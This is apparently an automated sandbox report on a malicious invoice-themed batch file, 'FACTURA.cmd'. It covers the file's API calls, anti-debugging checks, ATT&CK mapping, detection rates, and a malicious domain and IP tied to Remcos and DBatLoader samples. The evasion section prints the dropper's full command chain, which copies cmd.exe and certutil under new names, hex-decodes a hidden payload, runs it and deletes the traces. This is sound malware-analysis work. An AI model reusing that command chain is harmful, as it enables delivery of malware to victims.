      Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF793741560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,5_2_00007FF793741560
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E087234C wcschr,#357,#357,#359,FindFirstFileW,wcsrchr,_wcsnicmp,iswxdigit,wcstoul,FindNextFileW,#359,#359,#357,#357,LocalFree,LocalFree,FindClose,6_2_00007FF7E087234C
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E080C6F8 memset,qsort,#357,FindFirstFileW,GetLastError,bsearch,LocalAlloc,LocalReAlloc,LocalAlloc,FindNextFileW,GetLastError,DeleteFileW,GetLastError,#359,#357,FindClose,LocalFree,LocalFree,6_2_00007FF7E080C6F8
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E0876F80 #359,FindFirstFileW,FindNextFileW,FindClose,LocalAlloc,#357,6_2_00007FF7E0876F80
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E08710C4 #357,FindFirstFileW,LocalFree,FindNextFileW,FindClose,LocalFree,#357,6_2_00007FF7E08710C4
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E0873100 #357,FindFirstFileW,#359,FindNextFileW,FindClose,LocalFree,#357,6_2_00007FF7E0873100
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E081B3D8 GetLastError,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,GetLastError,#357,FindClose,I_CryptCreateLruCache,GetLastError,I_CryptCreateLruCache,GetLastError,#357,6_2_00007FF7E081B3D8
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E081D4A4 CreateSemaphoreW,GetLastError,CreateEventW,GetLastError,GetLastError,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,GetLastError,#357,FindClose,CloseHandle,CloseHandle,6_2_00007FF7E081D4A4
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E07DD440 GetFileAttributesW,#357,#357,#357,FindFirstFileW,LocalFree,#357,FindNextFileW,#357,LocalFree,FindClose,LocalFree,LocalFree,LocalFree,LocalFree,6_2_00007FF7E07DD440
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E0853674 #357,LocalAlloc,#357,wcsrchr,FindFirstFileW,GetLastError,#359,lstrcmpW,lstrcmpW,#359,RemoveDirectoryW,GetLastError,#359,#359,FindNextFileW,FindClose,LocalFree,LocalFree,DeleteFileW,GetLastError,#359,6_2_00007FF7E0853674
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E08719F8 #359,FindFirstFileW,FindNextFileW,FindClose,6_2_00007FF7E08719F8
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E0871B04 FindFirstFileW,GetLastError,#357,#359,DeleteFileW,FindNextFileW,FindClose,#359,6_2_00007FF7E0871B04
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E081DBC0 FindFirstFileW,GetLastError,CertOpenStore,CertAddStoreToCollection,CertCloseStore,FindNextFileW,GetLastError,GetLastError,#357,GetLastError,GetLastError,#357,LocalFree,CertCloseStore,CertCloseStore,FindClose,6_2_00007FF7E081DBC0
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E0815E58 GetLastError,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,GetLastError,#357,FindClose,6_2_00007FF7E0815E58
      Source: C:\Users\Public\Libraries\Host.COMCode function: 9_2_02DF5908 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,9_2_02DF5908
      Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF79375823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,10_2_00007FF79375823C
      Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF793752978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove,10_2_00007FF793752978
      Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF793767B4C FindFirstFileW,FindNextFileW,FindClose,10_2_00007FF793767B4C
      Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF7937435B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose,10_2_00007FF7937435B8
      Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF793741560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,10_2_00007FF793741560
      Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF79375823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,11_2_00007FF79375823C
      Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF793752978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove,11_2_00007FF793752978
      Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF793767B4C FindFirstFileW,FindNextFileW,FindClose,11_2_00007FF793767B4C
      Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7937435B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose,11_2_00007FF7937435B8
      Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF793741560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,11_2_00007FF793741560
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E085511C GetSystemInfo,CryptFindOIDInfo,#359,CreateFileW,GetLastError,#357,#359,GetFileSize,#357,CreateFileMappingW,GetLastError,#359,#357,LocalAlloc,BCryptCreateHash,#360,MapViewOfFile,BCryptHashData,#360,UnmapViewOfFile,LocalAlloc,GetLastError,#357,GetLastError,BCryptFinishHash,#360,LocalAlloc,LocalFree,#357,UnmapViewOfFile,CloseHandle,CloseHandle,BCryptDestroyHash,#360,LocalFree,LocalFree,6_2_00007FF7E085511C
      Source: Host.COM, 00000009.00000002.3032889978.00000000007FF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWx
      Source: Host.COM, 00000009.00000002.3032889978.000000000084D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
      Source: C:\Users\Public\Libraries\Host.COMAPI call chain: ExitProcess graph end node

      Anti Debugging

      Source: C:\Users\Public\Libraries\Host.COMCode function: 9_2_02E0F740 GetModuleHandleW,GetProcAddress,CheckRemoteDebuggerPresent,9_2_02E0F740
      Source: C:\Users\Public\Libraries\Host.COM Process queried: DebugPort
      Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF7937663FC GetCurrentThreadId,IsDebuggerPresent,OutputDebugStringW,3_2_00007FF7937663FC
      Source: C:\Users\Public\Libraries\Host.COMCode function: 9_2_02E08954 LoadLibraryW,GetProcAddress,FreeLibrary,9_2_02E08954
      Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF79375823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,3_2_00007FF79375823C
      Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF793758FA4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_00007FF793758FA4
      Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF7937593B0 SetUnhandledExceptionFilter,3_2_00007FF7937593B0
      Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF793758FA4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_00007FF793758FA4
      Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF7937593B0 SetUnhandledExceptionFilter,5_2_00007FF7937593B0
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E08A4E18 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,6_2_00007FF7E08A4E18
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E08A53E0 SetUnhandledExceptionFilter,6_2_00007FF7E08A53E0
      Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF793758FA4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,10_2_00007FF793758FA4
      Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF7937593B0 SetUnhandledExceptionFilter,10_2_00007FF7937593B0
      Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF793758FA4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,11_2_00007FF793758FA4
      Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7937593B0 SetUnhandledExceptionFilter,11_2_00007FF7937593B0

      HIPS / PFW / Operating System Protection Evasion

      Source: C:\Windows\System32\extrac32.exe File created: C:\Users\Public\kn.exe
      Source: C:\Windows\System32\extrac32.exe File created: C:\Users\Public\alpha.exe
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E0857024 GetModuleHandleW,GetProcAddress,#356,#357,CloseHandle,LocalFree,LocalFree,LocalFree,ImpersonateLoggedOnUser,#356,EqualSid,#357,LogonUserExW,GetLastError,ImpersonateLoggedOnUser,#356,#359,RevertToSelf,#356,6_2_00007FF7E0857024
      Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\extrac32.exe C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe"
      Source: C:\Windows\System32\cmd.exe Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
      Source: C:\Windows\System32\cmd.exe Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\FACTURA.cmd" "C:\\Users\\Public\\Host.GIF" 3
      Source: C:\Windows\System32\cmd.exe Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\Host.GIF" "C:\\Users\\Public\\Libraries\\Host.COM" 10
      Source: C:\Windows\System32\cmd.exe Process created: C:\Users\Public\Libraries\Host.COM C:\Users\Public\Libraries\Host.COM
      Source: C:\Windows\System32\cmd.exe Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\kn.exe" / A / F / Q / S
      Source: C:\Windows\System32\cmd.exe Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\Host.GIF" / A / F / Q / S
      Source: C:\Users\Public\alpha.exe Process created: C:\Windows\System32\extrac32.exe extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
      Source: C:\Users\Public\alpha.exe Process created: C:\Users\Public\kn.exe C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\FACTURA.cmd" "C:\\Users\\Public\\Host.GIF" 3
      Source: C:\Users\Public\alpha.exe Process created: C:\Users\Public\kn.exe C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\Host.GIF" "C:\\Users\\Public\\Libraries\\Host.COM" 10
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E0844AF4 GetSecurityDescriptorDacl,GetLastError,SetEntriesInAclW,SetSecurityDescriptorDacl,GetLastError,#357,#357,LocalFree,LocalFree,LocalFree,6_2_00007FF7E0844AF4
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E0854E98 AllocateAndInitializeSid,GetLastError,#357,GetCurrentThread,GetLastError,OpenThreadToken,GetLastError,GetCurrentProcess,GetLastError,OpenProcessToken,GetLastError,DuplicateToken,GetLastError,CheckTokenMembership,GetLastError,CloseHandle,CloseHandle,FreeSid,6_2_00007FF7E0854E98
      Source: C:\Users\Public\alpha.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,setlocale,3_2_00007FF7937551EC
      Source: C:\Users\Public\alpha.exeCode function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetDateFormatW,GetDateFormatW,realloc,GetDateFormatW,memmove,GetLastError,realloc,3_2_00007FF793746EE4
      Source: C:\Users\Public\alpha.exeCode function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetTimeFormatW,3_2_00007FF793753140
      Source: C:\Users\Public\alpha.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,setlocale,5_2_00007FF7937551EC
      Source: C:\Users\Public\alpha.exeCode function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetDateFormatW,GetDateFormatW,realloc,GetDateFormatW,memmove,GetLastError,realloc,5_2_00007FF793746EE4
      Source: C:\Users\Public\alpha.exeCode function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetTimeFormatW,5_2_00007FF793753140
      Source: C:\Users\Public\kn.exeCode function: LoadLibraryExW,SearchPathW,FindResourceExW,GetUserDefaultUILanguage,GetLocaleInfoW,wcsncmp,GetSystemDefaultUILanguage,FreeLibrary,FreeLibrary,LoadLibraryExW,FreeLibrary,6_2_00007FF7E08A3800
      Source: C:\Users\Public\Libraries\Host.COMCode function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,9_2_02DF5ACC
      Source: C:\Users\Public\Libraries\Host.COMCode function: GetLocaleInfoA,9_2_02DFA7CC
      Source: C:\Users\Public\Libraries\Host.COMCode function: lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,9_2_02DF5BD8
      Source: C:\Users\Public\Libraries\Host.COMCode function: GetLocaleInfoA,9_2_02DFA818
      Source: C:\Users\Public\alpha.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,setlocale,10_2_00007FF7937551EC
      Source: C:\Users\Public\alpha.exeCode function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetDateFormatW,GetDateFormatW,realloc,GetDateFormatW,memmove,GetLastError,realloc,10_2_00007FF793746EE4
      Source: C:\Users\Public\alpha.exeCode function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetTimeFormatW,10_2_00007FF793753140
      Source: C:\Users\Public\alpha.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,setlocale,11_2_00007FF7937551EC
      Source: C:\Users\Public\alpha.exeCode function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetDateFormatW,GetDateFormatW,realloc,GetDateFormatW,memmove,GetLastError,realloc,11_2_00007FF793746EE4
      Source: C:\Users\Public\alpha.exeCode function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetTimeFormatW,11_2_00007FF793753140
      Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation
      Source: C:\Users\Public\alpha.exe Queries volume information: C:\ VolumeInformation
      Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF793746EE4 GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetDateFormatW,GetDateFormatW,realloc,GetDateFormatW,memmove,GetLastError,realloc,3_2_00007FF793746EE4
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E07F8944 GetComputerNameExW,GetLastError,#357,GetUserNameExW,GetLastError,#357,#357,#357,#357,#357,#357,6_2_00007FF7E07F8944
      Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF79374586C GetVersion,3_2_00007FF79374586C
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E07B227C DsGetDcNameW,#357,DsBindW,DsCrackNamesW,#357,#357,#357,#357,#357,LocalAlloc,#359,DsUnBindW,NetApiBufferFree,DsFreeNameResultW,LocalFree,LocalFree,6_2_00007FF7E07B227C
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E07CE568 #357,LookupAccountSidW,GetLastError,#357,DsGetDcNameW,DsBindW,DsGetDomainControllerInfoW,DsGetDomainControllerInfoW,#357,DsUnBindW,NetApiBufferFree,LocalFree,6_2_00007FF7E07CE568
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E07B54A0 wcschr,NetApiBufferFree,DsFreeNameResultW,#13,LocalFree,DsGetDcNameW,#359,#224,#224,DsBindW,#357,DsCrackNamesW,#357,#145,#359,#359,#14,#359,#73,#359,#208,#26,#127,LocalFree,#140,#359,#224,#167,#27,#357,#357,#41,NetApiBufferFree,DsUnBindW,DsFreeNameResultW,#13,LocalFree,6_2_00007FF7E07B54A0
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E07D5648 #357,#357,DsGetSiteNameW,#359,LocalAlloc,LocalAlloc,GetTickCount,DsGetSiteNameW,GetTickCount,#207,LocalFree,#359,NetApiBufferFree,#357,#357,#207,LocalFree,#359,#359,#359,LocalFree,NetApiBufferFree,NetApiBufferFree,LocalFree,LocalFree,#357,DsUnBindW,6_2_00007FF7E07D5648
      Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
      Gather Victim Identity Information | Acquire Infrastructure | 2 Valid Accounts | 1 Native API | 1 DLL Side-Loading | 1 DLL Side-Loading | 2 Disable or Modify Tools | OS Credential Dumping | 1 System Time Discovery | Remote Services | 11 Archive Collected Data | 3 Ingress Tool Transfer | Exfiltration Over Other Network Medium | 1 Data Encrypted for Impact
      Credentials | Domains | Default Accounts | Scheduled Task/Job | 2 Valid Accounts | 2 Valid Accounts | 1 Deobfuscate/Decode Files or Information | LSASS Memory | 1 Account Discovery | Remote Desktop Protocol | Data from Removable Media | 21 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service
      Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 21 Access Token Manipulation | 2 Obfuscated Files or Information | Security Account Manager | 1 System Network Connections Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | 3 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
      Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | 11 Process Injection | 1 Install Root Certificate | NTDS | 1 File and Directory Discovery | Distributed Component Object Model | Input Capture | 114 Application Layer Protocol | Traffic Duplication | Data Destruction
      Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Timestomp | LSA Secrets | 35 System Information Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
      Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 DLL Side-Loading | Cached Domain Credentials | 1 Query Registry | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
      DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 211 Masquerading | DCSync | 331 Security Software Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
      Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 2 Valid Accounts | Proc Filesystem | 1 Virtualization/Sandbox Evasion | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
      Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 1 Virtualization/Sandbox Evasion | /etc/passwd and /etc/shadow | 1 Application Window Discovery | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
      IP Addresses | Compromise Infrastructure | Supply Chain Compromise | PowerShell | Cron | Cron | 21 Access Token Manipulation | Network Sniffing | 1 System Owner/User Discovery | Shared Webroot | Local Data Staging | File Transfer Protocols | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | External Defacement
      Network Security Appliances | Domains | Compromise Software Dependencies and Development Tools | AppleScript | Launchd | Launchd | 11 Process Injection | Input Capture | System Network Connections Discovery | Software Deployment Tools | Remote Data Staging | Mail Protocols | Exfiltration Over Unencrypted Non-C2 Protocol | Firmware Corruption
      Behavior graph (image not reproduced). Behavior Graph ID: 1532879; Sample: FACTURA.cmd; Startdate: 14/10/2024; Architecture: WINDOWS; Score: 100

      Source | Detection | Scanner | Label | Link
      FACTURA.cmd | 33% | ReversingLabs | Script-BAT.Packed.Generic |
      FACTURA.cmd | 35% | Virustotal | | Browse
      Source | Detection | Scanner | Label | Link
      C:\Users\Public\Libraries\Host.COM | 100% | Joe Sandbox ML | |
      C:\Users\Public\Libraries\Host.COM | 51% | Virustotal | | Browse
      C:\Users\Public\alpha.exe | 0% | ReversingLabs | |
      C:\Users\Public\alpha.exe | 0% | Virustotal | | Browse
      C:\Users\Public\kn.exe | 0% | ReversingLabs | |
      C:\Users\Public\kn.exe | 0% | Virustotal | | Browse
      No Antivirus matches
      Source | Detection | Scanner | Label | Link
      taksonsdfg.co.in | 10% | Virustotal | | Browse
      Source | Detection | Scanner | Label | Link
      https://login.microsoftonline.com/%s/oauth2/authorize | 0% | Virustotal | | Browse
      https://login.microsoftonline.com/%s/oauth2/token | 0% | Virustotal | | Browse
      https://taksonsdfg.co.in/./ | 5% | Virustotal | | Browse
      https://taksonsdfg.co.in/H | 0% | Virustotal | | Browse
      https://enterpriseregistration.windows.net/EnrollmentServer/key/ | 0% | Virustotal | | Browse
      https://taksonsdfg.co.in/34243456dfgd/255_Znrgbbhcbyx | 11% | Virustotal | | Browse
      https://taksonsdfg.co.in/x | 10% | Virustotal | | Browse
      https://taksonsdfg.co.in/ | 5% | Virustotal | | Browse
      https://login.microsoftonline.com/%s/oauth2/authorizeJoinStatusStorage::SetDefaultDiscoveryMetadatah | 0% | Virustotal | | Browse
      https://enterpriseregistration.windows.net/EnrollmentServer/DeviceEnrollmentWebService.svc | 0% | Virustotal | | Browse
      http://www.pmail.com | 0% | Virustotal | | Browse
      https://enterpriseregistration.windows.net/EnrollmentServer/device/ | 0% | Virustotal | | Browse
      Name | IP | Active | Malicious | Antivirus Detection | Reputation
      taksonsdfg.co.in | 108.170.55.202 | true | true | | unknown
      Name | Malicious | Antivirus Detection | Reputation
      https://taksonsdfg.co.in/34243456dfgd/255_Znrgbbhcbyx | true | | unknown
                                          IP | Domain | Country | Flag | ASN | ASN Name | Malicious
                                          108.170.55.202 | taksonsdfg.co.in | United States | | 20454 | SSASN2US | true
                                          Joe Sandbox version:41.0.0 Charoite
                                          Analysis ID:1532879
                                          Start date and time:2024-10-14 04:28:13 +02:00
                                          Joe Sandbox product:CloudBasic
                                          Overall analysis duration:0h 8m 25s
                                          Hypervisor based Inspection enabled:false
                                          Report type:full
                                          Cookbook file name:default.jbs
                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                          Number of analysed new started processes analysed:16
                                          Number of new started drivers analysed:0
                                          Number of existing processes analysed:0
                                          Number of existing drivers analysed:0
                                          Number of injected processes analysed:0
                                          Technologies:
                                          • HCA enabled
                                          • EGA enabled
                                          • AMSI enabled
                                          Analysis Mode:default
                                          Analysis stop reason:Timeout
                                          Sample name:FACTURA.cmd
                                          Detection:MAL
                                          Classification:mal100.bank.troj.evad.winCMD@22/11@1/1
                                          EGA Information:
                                          • Successful, ratio: 100%
                                          HCA Information:
                                          • Successful, ratio: 100%
                                          • Number of executed functions: 60
                                          • Number of non-executed functions: 208
                                          Cookbook Comments:
                                          • Found application associated with file extension: .cmd
                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                          • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                          • Not all processes where analyzed, report is missing behavior information
                                          • Report size exceeded maximum capacity and may have missing disassembly code.
                                          • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                          • Report size getting too big, too many NtSetInformationFile calls found.
                                          Time | Type | Description
                                          22:29:16 | API Interceptor | 109x Sleep call for process: Host.COM modified
                                          Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                                          108.170.55.202 | GestionPagoAProveedores_100920241725998901306_PDF.cmd | Get hash | malicious | Remcos, DBatLoader, FormBook | Browse |
                                          108.170.55.202 | 241481565-044416-sanlccjavap0003-6624_PDF.TXT.PNG.MPEG.CMD.cmd | Get hash | malicious | Remcos, DBatLoader, FormBook | Browse |
                                          108.170.55.202 | Julcbozqsvtzlo.cmd | Get hash | malicious | Remcos, AveMaria, DBatLoader, PrivateLoader, UACMe | Browse |
                                          108.170.55.202 | Uduknnywyznljn.exe | Get hash | malicious | Remcos, DBatLoader | Browse |
                                          108.170.55.202 | IN-34823_PO39276-pdf.vbe | Get hash | malicious | Remcos, DBatLoader | Browse |
                                          108.170.55.202 | Products_Specification.XLs.PIF.exe | Get hash | malicious | Remcos, DBatLoader | Browse |
                                          108.170.55.202 | PAYMENT SWIFT.XLs.exe | Get hash | malicious | AveMaria, DBatLoader, UACMe | Browse |
                                          108.170.55.202 | #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Get hash | malicious | Remcos, DBatLoader | Browse |
                                          108.170.55.202 | Your file name without extension goes here.exe | Get hash | malicious | AgentTesla | Browse |
                                          108.170.55.202 | R9eF05c3nd.exe | Get hash | malicious | AgentTesla | Browse |
                                                              Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                                                              taksonsdfg.co.in | GestionPagoAProveedores_100920241725998901306_PDF.cmd | Get hash | malicious | Remcos, DBatLoader, FormBook | Browse | 108.170.55.202
                                                              taksonsdfg.co.in | 241481565-044416-sanlccjavap0003-6624_PDF.TXT.PNG.MPEG.CMD.cmd | Get hash | malicious | Remcos, DBatLoader, FormBook | Browse | 108.170.55.202
                                                              taksonsdfg.co.in | Julcbozqsvtzlo.cmd | Get hash | malicious | Remcos, AveMaria, DBatLoader, PrivateLoader, UACMe | Browse | 108.170.55.202
                                                              Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                                                              SSASN2US | AGjaVihni8.elf | Get hash | malicious | Mirai, Gafgyt | Browse | 66.85.144.18
                                                              SSASN2US | GestionPagoAProveedores_100920241725998901306_PDF.cmd | Get hash | malicious | Remcos, DBatLoader, FormBook | Browse | 108.170.55.202
                                                              SSASN2US | 241481565-044416-sanlccjavap0003-6624_PDF.TXT.PNG.MPEG.CMD.cmd | Get hash | malicious | Remcos, DBatLoader, FormBook | Browse | 108.170.55.202
                                                              SSASN2US | SecuriteInfo.com.Trojan.Packed.9434.374.exe | Get hash | malicious | SystemBC | Browse | 66.85.173.12
                                                              SSASN2US | SecuriteInfo.com.Trojan.Packed.9434.374.exe | Get hash | malicious | SystemBC | Browse | 66.85.173.12
